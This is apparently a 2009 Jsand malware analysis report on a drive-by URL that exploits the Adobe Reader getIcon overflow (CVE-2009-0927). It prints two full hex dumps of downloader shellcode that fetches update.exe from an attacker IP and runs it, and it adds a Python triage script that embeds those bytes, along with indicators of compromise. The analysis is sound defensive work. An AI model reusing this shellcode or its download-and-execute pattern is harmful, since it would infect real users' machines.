Analysis report for http://yahoo-analytics.net/laso/s.php

Sample Overview

URL               http://yahoo-analytics.net/laso/s.php
MD5               f69151533f36f14c4a058bf3aa6441a9
Analysis Started  2009-09-29 00:28:31
Report Generated  2009-09-29 00:28:37
Jsand version     1.03.02

See the report for domain yahoo-analytics.net.

Detection results

Detector        Result
Jsand 1.03.02   malicious

Exploits

Name:         Adobe getIcon
Description:  Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object
Reference:    CVE-2009-0927

Deobfuscation results

Evals

Writes

No writes.

Network Activity

Requests

URL                                             Status  Content Type
http://yahoo-analytics.net/laso/s.php           404     text/javascript
about:blank                                     200     text/html
http://213.163.89.54/lib/index.php              200     text/html
http://213.163.89.54/lib/searchYouFor.pdf       200     application/pdf
http://213.163.89.54/lib/yearsBeliefBelow.swf   200     application/x-shockwave-flash

Note that the landing URL answered with HTTP 404 but still returned a text/javascript body, and the follow-on requests show that body was executed. A 404 status alone is therefore not evidence that a suspicious URL is dead.

Redirects

No redirects.

ActiveX controls

Shellcode and Malware

Two shellcode instances were extracted. They are byte-identical except for the id parameter of the embedded download URL (id=6 in the first, id=5 in the second). Offsets are relative to the first byte of the shellcode.

Shellcode 1 of 2 (download URL ends in id=6)

Off.  Hexadecimal                                       ASCII
0000  50 53 51 52 56 57 55 9c  e8 00 00 00 00 5d 83 ed  PSQRVWU......]..
0010  0d 31 c0 64 03 40 30 78  0c 8b 40 0c 8b 70 1c ad  .1.d.@0x..@..p..
0020  8b 40 08 eb 09 8b 40 34  8d 40 7c 8b 40 3c 56 57  .@....@4.@|.@<VW
0030  be 5e 01 00 00 01 ee bf  4e 01 00 00 01 ef e8 d6  .^......N.......
0040  01 00 00 5f 5e 89 ea 81  c2 5e 01 00 00 52 68 80  ..._^....^...Rh.
0050  00 00 00 ff 95 4e 01 00  00 89 ea 81 c2 5e 01 00  .....N.......^..
0060  00 31 f6 01 c2 8a 9c 35  63 02 00 00 80 fb 00 74  .1.....5c......t
0070  06 88 1c 32 46 eb ee c6  04 32 00 89 ea 81 c2 45  ...2F....2.....E
0080  02 00 00 52 ff 95 52 01  00 00 89 ea 81 c2 50 02  ...R..R.......P.
0090  00 00 52 50 ff 95 56 01  00 00 6a 00 6a 00 89 ea  ..RP..V...j.j...
00a0  81 c2 5e 01 00 00 52 89  ea 81 c2 78 02 00 00 52  ..^...R....x...R
00b0  6a 00 ff d0 6a 05 89 ea  81 c2 5e 01 00 00 52 ff  j...j.....^...R.
00c0  95 5a 01 00 00 89 ea 81  c2 5e 01 00 00 52 68 80  .Z.......^...Rh.
00d0  00 00 00 ff 95 4e 01 00  00 89 ea 81 c2 5e 01 00  .....N.......^..
00e0  00 31 f6 01 c2 8a 9c 35  6e 02 00 00 80 fb 00 74  .1.....5n......t
00f0  06 88 1c 32 46 eb ee c6  04 32 00 89 ea 81 c2 45  ...2F....2.....E
0100  02 00 00 52 ff 95 52 01  00 00 89 ea 81 c2 50 02  ...R..R.......P.
0110  00 00 52 50 ff 95 56 01  00 00 6a 00 6a 00 89 ea  ..RP..V...j.j...
0120  81 c2 5e 01 00 00 52 89  ea 81 c2 a6 02 00 00 52  ..^...R........R
0130  6a 00 ff d0 6a 05 89 ea  81 c2 5e 01 00 00 52 ff  j...j.....^...R.
0140  95 5a 01 00 00 9d 5d 5f  5e 5a 59 5b 58 c3 00 00  .Z....]_^ZY[X...
0150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 47 65  ..............Ge
0160  74 54 65 6d 70 50 61 74  68 41 00 4c 6f 61 64 4c  tTempPathA.LoadL
0170  69 62 72 61 72 79 41 00  47 65 74 50 72 6f 63 41  ibraryA.GetProcA
0180  64 64 72 65 73 73 00 57  69 6e 45 78 65 63 00 bb  ddress.WinExec..
0190  89 f2 89 f7 30 c0 ae 75  fd 29 f7 89 f9 31 c0 be  ....0..u.)...1..
01a0  3c 00 00 00 03 b5 1b 02  00 00 66 ad 03 85 1b 02  <.........f.....
01b0  00 00 8b 70 78 83 c6 1c  03 b5 1b 02 00 00 8d bd  ...px...........
01c0  1f 02 00 00 ad 03 85 1b  02 00 00 ab ad 03 85 1b  ................
01d0  02 00 00 50 ab ad 03 85  1b 02 00 00 ab 5e 31 db  ...P.........^1.
01e0  ad 56 03 85 1b 02 00 00  89 c6 89 d7 51 fc f3 a6  .V..........Q...
01f0  59 74 04 5e 43 eb e9 5e  93 d1 e0 03 85 27 02 00  Yt.^C..^.....'..
0200  00 31 f6 96 66 ad c1 e0  02 03 85 1f 02 00 00 89  .1..f...........
0210  c6 ad 03 85 1b 02 00 00  c3 eb 10 00 00 00 00 00  ................
0220  00 00 00 00 00 00 00 00  00 00 00 89 85 1b 02 00  ................
0230  00 56 57 e8 58 ff ff ff  5f 5e ab 01 ce 80 3e bb  .VW.X..._^....>.
0240  74 02 eb ed c3 55 52 4c  4d 4f 4e 2e 44 4c 4c 00  t....URLMON.DLL.
0250  55 52 4c 44 6f 77 6e 6c  6f 61 64 54 6f 46 69 6c  URLDownloadToFil
0260  65 41 00 75 70 64 61 74  65 2e 65 78 65 00 63 72  eA.update.exe.cr
0270  61 73 68 2e 70 68 70 00  68 74 74 70 3a 2f 2f 32  ash.php.http://2
0280  31 33 2e 31 36 33 2e 38  39 2e 35 34 2f 6c 69 62  13.163.89.54/lib
0290  2f 75 70 64 61 74 65 2e  70 68 70 3f 69 64 3d 36  /update.php?id=6
02a0  00 90                                             ..
Shellcode 2 of 2 (identical to the first except the download URL ends in id=5)

Off.  Hexadecimal                                       ASCII
0000  50 53 51 52 56 57 55 9c  e8 00 00 00 00 5d 83 ed  PSQRVWU......]..
0010  0d 31 c0 64 03 40 30 78  0c 8b 40 0c 8b 70 1c ad  .1.d.@0x..@..p..
0020  8b 40 08 eb 09 8b 40 34  8d 40 7c 8b 40 3c 56 57  .@....@4.@|.@<VW
0030  be 5e 01 00 00 01 ee bf  4e 01 00 00 01 ef e8 d6  .^......N.......
0040  01 00 00 5f 5e 89 ea 81  c2 5e 01 00 00 52 68 80  ..._^....^...Rh.
0050  00 00 00 ff 95 4e 01 00  00 89 ea 81 c2 5e 01 00  .....N.......^..
0060  00 31 f6 01 c2 8a 9c 35  63 02 00 00 80 fb 00 74  .1.....5c......t
0070  06 88 1c 32 46 eb ee c6  04 32 00 89 ea 81 c2 45  ...2F....2.....E
0080  02 00 00 52 ff 95 52 01  00 00 89 ea 81 c2 50 02  ...R..R.......P.
0090  00 00 52 50 ff 95 56 01  00 00 6a 00 6a 00 89 ea  ..RP..V...j.j...
00a0  81 c2 5e 01 00 00 52 89  ea 81 c2 78 02 00 00 52  ..^...R....x...R
00b0  6a 00 ff d0 6a 05 89 ea  81 c2 5e 01 00 00 52 ff  j...j.....^...R.
00c0  95 5a 01 00 00 89 ea 81  c2 5e 01 00 00 52 68 80  .Z.......^...Rh.
00d0  00 00 00 ff 95 4e 01 00  00 89 ea 81 c2 5e 01 00  .....N.......^..
00e0  00 31 f6 01 c2 8a 9c 35  6e 02 00 00 80 fb 00 74  .1.....5n......t
00f0  06 88 1c 32 46 eb ee c6  04 32 00 89 ea 81 c2 45  ...2F....2.....E
0100  02 00 00 52 ff 95 52 01  00 00 89 ea 81 c2 50 02  ...R..R.......P.
0110  00 00 52 50 ff 95 56 01  00 00 6a 00 6a 00 89 ea  ..RP..V...j.j...
0120  81 c2 5e 01 00 00 52 89  ea 81 c2 a6 02 00 00 52  ..^...R........R
0130  6a 00 ff d0 6a 05 89 ea  81 c2 5e 01 00 00 52 ff  j...j.....^...R.
0140  95 5a 01 00 00 9d 5d 5f  5e 5a 59 5b 58 c3 00 00  .Z....]_^ZY[X...
0150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 47 65  ..............Ge
0160  74 54 65 6d 70 50 61 74  68 41 00 4c 6f 61 64 4c  tTempPathA.LoadL
0170  69 62 72 61 72 79 41 00  47 65 74 50 72 6f 63 41  ibraryA.GetProcA
0180  64 64 72 65 73 73 00 57  69 6e 45 78 65 63 00 bb  ddress.WinExec..
0190  89 f2 89 f7 30 c0 ae 75  fd 29 f7 89 f9 31 c0 be  ....0..u.)...1..
01a0  3c 00 00 00 03 b5 1b 02  00 00 66 ad 03 85 1b 02  <.........f.....
01b0  00 00 8b 70 78 83 c6 1c  03 b5 1b 02 00 00 8d bd  ...px...........
01c0  1f 02 00 00 ad 03 85 1b  02 00 00 ab ad 03 85 1b  ................
01d0  02 00 00 50 ab ad 03 85  1b 02 00 00 ab 5e 31 db  ...P.........^1.
01e0  ad 56 03 85 1b 02 00 00  89 c6 89 d7 51 fc f3 a6  .V..........Q...
01f0  59 74 04 5e 43 eb e9 5e  93 d1 e0 03 85 27 02 00  Yt.^C..^.....'..
0200  00 31 f6 96 66 ad c1 e0  02 03 85 1f 02 00 00 89  .1..f...........
0210  c6 ad 03 85 1b 02 00 00  c3 eb 10 00 00 00 00 00  ................
0220  00 00 00 00 00 00 00 00  00 00 00 89 85 1b 02 00  ................
0230  00 56 57 e8 58 ff ff ff  5f 5e ab 01 ce 80 3e bb  .VW.X..._^....>.
0240  74 02 eb ed c3 55 52 4c  4d 4f 4e 2e 44 4c 4c 00  t....URLMON.DLL.
0250  55 52 4c 44 6f 77 6e 6c  6f 61 64 54 6f 46 69 6c  URLDownloadToFil
0260  65 41 00 75 70 64 61 74  65 2e 65 78 65 00 63 72  eA.update.exe.cr
0270  61 73 68 2e 70 68 70 00  68 74 74 70 3a 2f 2f 32  ash.php.http://2
0280  31 33 2e 31 36 33 2e 38  39 2e 35 34 2f 6c 69 62  13.163.89.54/lib
0290  2f 75 70 64 61 74 65 2e  70 68 70 3f 69 64 3d 35  /update.php?id=5
02a0  00 90                                             ..
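The offsets in the dumps above can be resolved without executing anything: the stub starts with call/pop followed by sub ebp, 0xd, so ebp holds the shellcode base, and every imm32 in its add edx / mov bl / call [ebp+...] instructions is an offset into the shellcode itself. The following Python triage script is an added example, not part of the Jsand report or its tooling. It embeds the first dump as transcribed from the hex column (the second differs only in the trailing id=5), rebuilds the API slot table the resolver fills at offset 0x14e, resolves each pointer argument to the string it names, and flags the one reference (the second download URL at 0x2a6) that lies beyond the 674 captured bytes. Python is used because the task is static triage of the dump, not execution of the payload.

```python
"""Static triage of the shellcode dumped above (added example, not Jsand code).

The stub does call/pop then sub ebp, 0xd, so ebp is the shellcode base and the
imm32 in "add edx, imm32", "mov bl, [ebp+esi+imm32]" and "call [ebp+imm32]" are
offsets into the dump itself. Resolving them statically recovers the API slot
table, the string each call receives, and references beyond the capture.
"""
import re
import struct

# First dump from the report, transcribed from its hex column (674 bytes).
# The second dump is identical except that its URL ends in "id=5".
SHELLCODE = bytes.fromhex(
    "505351525657559ce8000000005d83ed0d31c064034030780c8b400c8b701cad"
    "8b4008eb098b40348d407c8b403c5657be5e01000001eebf4e01000001efe8d6"
    "0100005f5e89ea81c25e010000526880000000ff954e01000089ea81c25e0100"
    "0031f601c28a9c356302000080fb007406881c3246ebeec604320089ea81c245"
    "02000052ff955201000089ea81c2500200005250ff95560100006a006a0089ea"
    "81c25e0100005289ea81c278020000526a00ffd06a0589ea81c25e01000052ff"
    "955a01000089ea81c25e010000526880000000ff954e01000089ea81c25e0100"
    "0031f601c28a9c356e02000080fb007406881c3246ebeec604320089ea81c245"
    "02000052ff955201000089ea81c2500200005250ff95560100006a006a0089ea"
    "81c25e0100005289ea81c2a6020000526a00ffd06a0589ea81c25e01000052ff"
    "955a0100009d5d5f5e5a595b58c3000000000000000000000000000000004765"
    "7454656d705061746841004c6f61644c696272617279410047657450726f6341"
    "6464726573730057696e4578656300bb89f289f730c0ae75fd29f789f931c0be"
    "3c00000003b51b02000066ad03851b0200008b707883c61c03b51b0200008dbd"
    "1f020000ad03851b020000abad03851b02000050abad03851b020000ab5e31db"
    "ad5603851b02000089c689d751fcf3a65974045e43ebe95e93d1e00385270200"
    "0031f69666adc1e00203851f02000089c6ad03851b020000c3eb100000000000"
    "000000000000000000000089851b0200005657e858ffffff5f5eab01ce803ebb"
    "7402ebedc355524c4d4f4e2e444c4c0055524c446f776e6c6f6164546f46696c"
    "6541007570646174652e6578650063726173682e70687000687474703a2f2f32"
    "31332e3136332e38392e35342f6c69622f7570646174652e7068703f69643d36"
    "0090"
)


def c_string(buf, off):
    """NUL-terminated latin-1 string at buf[off:] ('' if off is past the end)."""
    end = buf.find(b"\x00", off)
    return buf[off:end if end >= 0 else None].decode("latin-1")


def api_table(buf):
    """Map resolver output slots (ebp+slot) to API names: the prologue sets
    esi=names and edi=slots; the loop stosd's one address per name until 0xbb."""
    m = re.search(rb"\xbe(.{4})\x01\xee\xbf(.{4})\x01\xef", buf, re.S)
    if not m:
        raise ValueError("resolver prologue not found")
    off, slot = struct.unpack("<II", m.group(1) + m.group(2))
    table = {}
    while buf[off] != 0xBB:
        name = c_string(buf, off)
        table[slot] = name
        off, slot = off + len(name) + 1, slot + 4
    return table


# ebp-relative operands used by the payload body:
#   89 ea 81 c2 imm32  mov edx, ebp ; add edx, imm32  (pointer pushed as argument)
#   8a 9c 35 imm32     mov bl, [ebp+esi+imm32]        (string appended to temp path)
#   ff 95 imm32        call [ebp+imm32]               (slot filled by the resolver)
OPERANDS = [
    ("ptr", re.compile(rb"\x89\xea\x81\xc2(.{4})", re.S)),
    ("copy", re.compile(rb"\x8a\x9c\x35(.{4})", re.S)),
    ("call", re.compile(rb"\xff\x95(.{4})", re.S)),
]


def ebp_references(buf):
    """(code_offset, kind, target_offset) for every operand above, in code order."""
    refs = []
    for kind, pat in OPERANDS:
        for m in pat.finditer(buf):
            refs.append((m.start(), kind, struct.unpack("<I", m.group(1))[0]))
    return sorted(refs)


def annotate(buf):
    """Describe each reference in execution order; flag targets beyond the dump."""
    slots = api_table(buf)
    names = set(slots.values())
    out = []
    for code_off, kind, target in ebp_references(buf):
        if target >= len(buf):
            text = f"{kind} -> 0x{target:x} OUTSIDE {len(buf)}-byte dump"
        elif kind == "call":
            text = f"call {slots.get(target, '?')}"
        elif c_string(buf, target) in names:
            # The API-name area is reused as the path buffer once resolved.
            text = f"{kind} -> 0x{target:x} path buffer (former API names)"
        else:
            text = f"{kind} -> 0x{target:x} {c_string(buf, target)!r}"
        out.append((code_off, text))
    return out


def iocs(buf):
    """Offset -> data string the payload hands to an API (URL, DLL, file names)."""
    names = set(api_table(buf).values())
    return {t: c_string(buf, t) for _, k, t in ebp_references(buf)
            if k != "call" and t < len(buf) and c_string(buf, t) not in names}


if __name__ == "__main__":
    for code_off, text in annotate(SHELLCODE):
        print(f"0x{code_off:03x}: {text}")
```

Running the script lists the call sequence GetTempPathA, LoadLibraryA("URLMON.DLL"), GetProcAddress(..., "URLDownloadToFileA"), WinExec, twice over. URLDownloadToFileA itself is invoked through call eax (ff d0) after GetProcAddress, so it does not appear among the ff 95 slot calls. The first pass fetches update.php?id=6 into %TEMP%\update.exe and runs it; the second pass appends crash.php to the temp path, but its URL operand points to offset 0x2a6, past the end of the captured bytes, so the dump does not show where that second file is downloaded from.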

Additional (potential) malware:

URL                                        Type                                                           Hash (MD5)
http://213.163.89.54/lib/update.php?id=5   MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit   dd75f500820b98d2b7acbe182c03dc86
http://213.163.89.54/lib/update.php?id=6   MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit   dd75f500820b98d2b7acbe182c03dc86

Both id values returned the same file (identical MD5).